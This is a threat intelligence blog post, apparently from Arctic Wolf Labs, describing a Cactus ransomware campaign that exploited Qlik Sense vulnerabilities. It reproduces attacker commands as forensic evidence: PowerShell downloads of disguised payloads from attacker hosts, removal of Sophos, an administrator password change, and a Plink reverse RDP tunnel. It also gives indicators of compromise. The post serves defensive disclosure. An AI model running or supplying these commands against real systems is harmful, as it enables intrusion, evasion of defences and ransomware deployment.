This article aims to share timely and relevant information about a rapidly developing campaign under investigation. We are publishing it as early as possible for the benefit of the cybersecurity community and we will update this blog with more details as our investigation continues.
Key Takeaways
- Exploitation of Qlik Sense application in the observed campaign.
- Cactus ransomware deployed in association with observed exploitation.
- ManageEngine UEMS and AnyDesk deployed for remote access.
- Malicious activity was spawned by Qlik Sense Scheduler in each intrusion.
Summary
Arctic Wolf Labs has observed a new Cactus ransomware campaign which exploits publicly-exposed installations of Qlik Sense, a cloud analytics and business intelligence platform.[1] Based on available evidence, we assess that all vulnerabilities exploited were previously identified by researchers from Praetorian [2,3]. For more information on these vulnerabilities, see the advisories published by Qlik (CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365) as well as our Security Bulletin.
This campaign marks the first documented instance Arctic Wolf is aware of where threat actors deploying Cactus ransomware have exploited vulnerabilities in Qlik Sense for initial access.
Intrusion Analysis
Arctic Wolf labs is currently responding to several instances of Qlik Sense exploitation for initial access.
Analysis is still ongoing, but based on research from Praetorian [2,3] and gathered forensic evidence, we currently assess that based on patch level Qlik Sense is likely being exploited either via the combination or direct abuse of CVE-2023-41266[5], CVE-2023-41265[4] or potentially CVE-2023-48365 [5] to achieve code execution.
Following exploitation of Qlik Sense installations, the observed execution chain was consistent between all intrusions identified and involves the Qlik Sense Scheduler service (Scheduler.exe) spawning uncommon processes.
CurrentDirectory”:”C:Program FilesQlikSenseScheduler
ParentImage”:”C:Program FilesQlikSenseSchedulerScheduler.exe
CommandLine”:”C:WindowsSystem32cmd.exe /c powershell iwr -uri http://zohoservice[.]net/putty.zip -OutFile c:windowstempputty.exe”
Malicious activities involving Scheduler.exe
The threat actors leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control, including:
- Renamed ManageEngine UEMS [7] executables, with a ZIP extension masquerading as Qlik files. These files were renamed again after being downloaded and invoked for silent installation
- AnyDesk, downloaded directly from anydesk.com [8]
- A Plink (PuTTY Link) binary, downloaded and renamed to putty.exe [9]
powershell iwr -URI 'http://216.107.136.46/Qliksens_updated.zip' -OutFile 'C:WindowsappcompatAcRes.exe' C:WindowsappcompatAcRes.exe /silent powershell start-bitstransfer -source http://zohoservice.net/qlik-sens-nov.zip -outfile c:windowstempQliksens.exe powershell Invoke-WebRequest https://download.anydesk.com/AnyDesk.exe -OutFile c:windowstempfile.exe powershell wget 'http://zohoservice.net/anydesk.zip' -outfile 'c:windowstempany.exe' powershell iwr -uri http://zohoservice.net/putty.zip -OutFile c:windowstempputty.exe powershell Invoke-WebRequest https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe -OutFile C:windowstempputty.exe
Multiple discovery commands were executed, and the output was redirected into .ttf files. We assume this was done to obtain the command output via the path traversal, but this assumption has yet to be verified.
dir c:windowsappcompat > ../Client/qmc/fonts/qle.ttf powershell Get-WmiObject -Class Win32_Product > ../Client/qmc/fonts/qle.ttf quser > ../Client/qmc/fonts/qle.ttf dir c:windwostemp > ../Client/qmc/fonts/qle.ttf
The threat actor was further observed to:
- Use msiexec to uninstall Sophos via its GUID
- Change the administrator account password
- Establish an RDP tunnel via Plink
MsiExec.exe /X{5C28F8A0-4BCB-4267-A869-2D589DF264F1} /qn > ../Client/qmc/fonts/qle.ttf
net user administrator Linux.110.110@123 > ../Client/qmc/fonts/qle.ttf
echo y "^"| c:windowstempputty.exe -ssh -P 443 -l admin -pw -R 45.61.147.176:50400:127.0.0.1:3389 45.61.147.176
Cactus Ransomware
In several instances, immediately following exploitation, Arctic Wolf detected malicious activities early in the kill chain and worked with customers to disrupt the progression of the attacks. We gained further insight into these activities during the investigation of a recent IR case which resulted in the deployment of Cactus ransomware.
Current evidence revealed that the threat actors:
- Used RDP for lateral movement
- Downloaded WizTree disk space analyzer [10]
- Leveraged rclone (renamed as svchost.exe) for data exfiltration
Based on significant overlaps observed in all intrusions we attribute all of the described attacks to the same threat actor, which was responsible for deployment of Cactus ransomware.
As the incident response (IR) investigation is ongoing, we will provide further technical details once they become available.
Indicators of Compromise
| Indicator | Type | Context |
|---|---|---|
| 45.61.147[.]176 | IP Address | ManageEngine Server IP for zohoservice[.]net |
| 216.107.136[.]46 | IP Address | ManageEngine Server Hosting payload over HTTP |
| 144.172.122[.]30 | IP Address | ManageEngine Server Hosting payload over HTTP |
| zohoservice[.]net | Domain Name | Hosting payload over HTTP |
| http://zohoservice[.]net/putty.zip | URL | Renamed PuTTY Link (Plink) |
| http://216.107.136[.]46/Qliksens_update.zip | URL | Renamed ManageEngine UEMS |
| http://216.107.136[.]46/Qliksens_updated.zip | URL | Renamed ManageEngine UEMS |
| http://zohoservice[.]net/qlik-sens-Patch.zip | URL | Renamed ManageEngine UEMS |
| http://zohoservice[.]net/qlik-sens-nov.zip | URL | Renamed ManageEngine UEMS |
| C:UsersPublicsvchost.exe | File path | Renamed Rclone |
| c:windowstempfile.exe | File path | Renamed AnyDesk |
| c:windowstempputty.exe | File path | Renamed PuTTY Link (Plink) |
| c:windowstempQliksens.exe | File path | Renamed ManageEngine UEMS |
| c:windowstempany.exe | File path | Renamed AnyDesk Installer |
| C:tempputty.exe | File path | Renamed PuTTY Link (Plink) |
| C:WindowsappcompatAcRes.exe | File path | Renamed ManageEngine UEMS |
| file.exe | Filename | Renamed AnyDesk Installer |
| anydesk.zip | Filename | Renamed AnyDesk Installer |
| AcRes.exe | Filename | Renamed ManageEngine UEMS |
| any.exe | Filename | Renamed AnyDesk Installer |
| putty.zip | Filename | ZIP containing PuTTY Link (Plink) |
| Qlik_sense_enterprise.zip | Filename | Renamed ManageEngine UEMS |
| qlik-sens-nov.zip | Filename | Renamed ManageEngine UEMS |
| qlik-sens-Patch.zip | Filename | Renamed ManageEngine UEMS |
| Qliksens.exe | Filename | Renamed ManageEngine UEMS |
| Qliksens_updated.zip | Filename | Renamed ManageEngine UEMS |
| Qliksens_update.zip | Filename | Renamed ManageEngine UEMS |
| 828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d | SHA256 | PuTTY Link (Plink) |
| https://download.anydesk.com/AnyDesk.exe | URL | Official AnyDesk Installer |
| 90b009b15eb1b5bc4a990ecdd86375fa25eaa67a8515ae6c6b3b58815d46fa82 | SHA256 | ManageEngine UEMS Installer |
| 3ac8308a7378dfe047eacd393c861d32df34bb47535972eb0a35631ab964d14d | SHA256 | ManageEngine UEMS Installer |
| 6cb87cad36f56aefcefbe754605c00ac92e640857fd7ca5faab7b9542ef80c96 | SHA256 | ManageEngine UEMS Installer |
References
1. https://www.qlik.com/us/products/qlik-sense
2. https://www.praetorian.com/blog/qlik-sense-technical-exploit/
3. https://www.praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/
4. https://nvd.nist.gov/vuln/detail/CVE-2023-41265
5. https://nvd.nist.gov/vuln/detail/CVE-2023-41266
6. https://nvd.nist.gov/vuln/detail/CVE-2023-48365
7. https://www.manageengine.com/unified-endpoint-management-security.html
8. https://anydesk.com/
9. https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
10. https://diskanalyzer.com/
By Stefan Hostetler, Markus Neis, Kyle Pagelow
Stefan Hostetler | Senior Threat Intelligence Researcher
Stefan is a Senior Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he focuses on extracting actionable insight from novel threats to help organizations protect themselves effectively.
Markus Neis | Principal Threat Intelligence Researcher
Markus Neis is a Principal Threat Intelligence Researcher in Arctic Wolf Labs focused on leading advanced threat research. He has more than a decade of experience in researching adversary tradecraft and responding to sophisticated attacks.
Kyle Pagelow | Principal Forensic Analyst
Kyle Pagelow is a Principal Forensic Analyst at Arctic Wolf Incident Response, focused on leading complex incident response and digital forensic investigations. He holds multiple certifications and has over 10 years of operational experience in incident response, defensive cyber operations, and threat intelligence.
Source: https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/